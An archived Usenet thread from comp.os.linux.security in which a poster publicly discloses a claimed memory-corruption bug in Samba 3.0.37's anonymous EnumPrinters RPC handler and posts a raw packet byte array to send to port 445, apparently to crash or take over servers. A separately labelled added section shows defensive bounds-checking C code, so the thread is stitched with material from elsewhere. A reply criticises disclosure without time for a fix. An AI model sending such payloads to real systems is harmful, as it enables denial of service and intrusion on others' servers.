Groups > comp.os.linux.security > #646 > unrolled thread
| Started by | "Gabriele Avosani" <g.avosani@gmail.com> |
|---|---|
| First post | 2015-05-18 18:56 +0200 |
| Last post | 2015-05-19 18:04 +0100 |
| Articles | 2 — 2 participants |
[Samba 3.0.37] EnumPrinters memory consumption "Gabriele Avosani" <g.avosani@gmail.com> - 2015-05-18 18:56 +0200
Re: [Samba 3.0.37] EnumPrinters memory consumption Richard Kettlewell <rjk@greenend.org.uk> - 2015-05-19 18:04 +0100
| From | "Gabriele Avosani" <g.avosani@gmail.com> |
|---|---|
| Date | 2015-05-18 18:56 +0200 |
| Subject | [Samba 3.0.37] EnumPrinters memory consumption |
| Message-ID | <mjd5k6$594$1@speranza.aioe.org> |
Hello,

there is a bug in Samba 3.0.37 (latest) in the EnumPrinters RPC function (anonymous access). The bug is in parse_prs.c:398: we take control of the length and source pointer of a memcpy, leading to memory corruption, very fast exhaustion of resources (block of computer very easy) and, probably, remote code execution.

This is the packet code to be sent to port 445, EnumPrinters RPC function, opcode 0x0.

```c
char fr1[]="\x0a\x00\x00\x00\x21\xd3\x9f\x98\x06\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\xd8\x50\x60\x00\x21\x33\x33\x73\x00\x00\x00\x01\x42\x42\x06\x20"
"\x0a\x00\x00\x00\x21\xd3\x9f\x28\x06\x00\x00\x00\x00\x00\x00\x00"
"\x06\x00\x00\x00\x41\x00\x41\x00\x41\x00\x41\x00\x41\x00\x00\x00"
"\xd8\x50\x60\x20\x21\x33\x33\x2a\x40\x40\x40\x20\x45\x45\x06\x20"
"\x00\x00";
```

Gabriele Avosani

P.S. Looking for a job as a remote programmer (short and long terms). PHP, Perl, Java, C/C++ and more (Linux and Windows), thanks in advance.
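The bug class named in the post above (a memcpy whose length and source come from the wire) is closed by validating every count against the bytes actually received before copying. The following is an added example, not code from the post or from Samba; the function name `copy_counted_utf16`, the 12-byte header layout (max count, offset, actual count) and the sample messages are assumptions made for the illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR 12u /* assumed header: u32 max_count, u32 offset, u32 actual_count */

/* Read a little-endian u32 without assuming alignment. */
static uint32_t rd_u32le(const uint8_t *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Hypothetical helper: copy one counted UTF-16 string (header, then
 * actual_count 2-byte characters) out of a received buffer.
 * Returns bytes consumed, or -1 if the message is rejected. */
long copy_counted_utf16(const uint8_t *buf, size_t buf_len,
                        uint8_t *dst, size_t dst_cap) {
    if (buf == NULL || dst == NULL || buf_len < HDR) return -1;
    uint32_t max_count = rd_u32le(buf);
    uint32_t offset    = rd_u32le(buf + 4);
    uint32_t actual    = rd_u32le(buf + 8);

    /* Wire counts must agree; subtract instead of add so nothing wraps. */
    if (offset > max_count || actual > max_count - offset) return -1;
    /* The claimed length must fit in the bytes actually received... */
    if (actual > (buf_len - HDR) / 2) return -1;
    /* ...and in the destination. */
    if (actual > dst_cap / 2) return -1;

    /* Source is always buf + HDR: no wire value is used as a pointer. */
    memcpy(dst, buf + HDR, (size_t)actual * 2);
    return (long)(HDR + (size_t)actual * 2);
}

/* Constructed sample messages (not taken from the post). */
static const uint8_t ok_msg[] = { 6,0,0,0, 0,0,0,0, 6,0,0,0,
    'A',0, 'A',0, 'A',0, 'A',0, 'A',0, 0,0 };
static const uint8_t huge_len[] = { 0,0,0,0x40, 0,0,0,0, 0,0,0,0x40, 'A',0, 'A',0 };
static const uint8_t bad_counts[] = { 2,0,0,0, 0,0,0,0, 6,0,0,0,
    'A',0, 'A',0, 'A',0, 'A',0, 'A',0, 0,0 };
static uint8_t scratch[16];
int main(void) {
    printf("ok=%ld huge=%ld bad=%ld\n",
           copy_counted_utf16(ok_msg, sizeof ok_msg, scratch, sizeof scratch),
           copy_counted_utf16(huge_len, sizeof huge_len, scratch, sizeof scratch),
           copy_counted_utf16(bad_counts, sizeof bad_counts, scratch, sizeof scratch));
    return 0;
}
```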
| From | Richard Kettlewell <rjk@greenend.org.uk> |
|---|---|
| Date | 2015-05-19 18:04 +0100 |
| Message-ID | <wwv1tic1ou1.fsf@l1AntVDjLrnP7Td3DQJ8ynzIq3lJMueXf87AxnpFoA.invalid> |
| In reply to | #646 |
"Gabriele Avosani" <g.avosani@gmail.com> writes: > there is a bug in Samba 3.0.37 (latest) in EnumPrinters rpc function > (anonymous access), the bug is in parse_prs.c:398, we take control of length > and source pointer of a memcpy, leading to memory corruption, very fast > exhaustion of resources (block of computer very easy) and, probably, remote > code execution. samba.org says the latest version is 4.1.something. If you think that version is also vulnerable, you should contact the Samba team, ideally in private. Posting vulnerabilities to Usenet without allowing any time for a fix to be deployed is rather irresponsible. -- http://www.greenend.org.uk/rjk/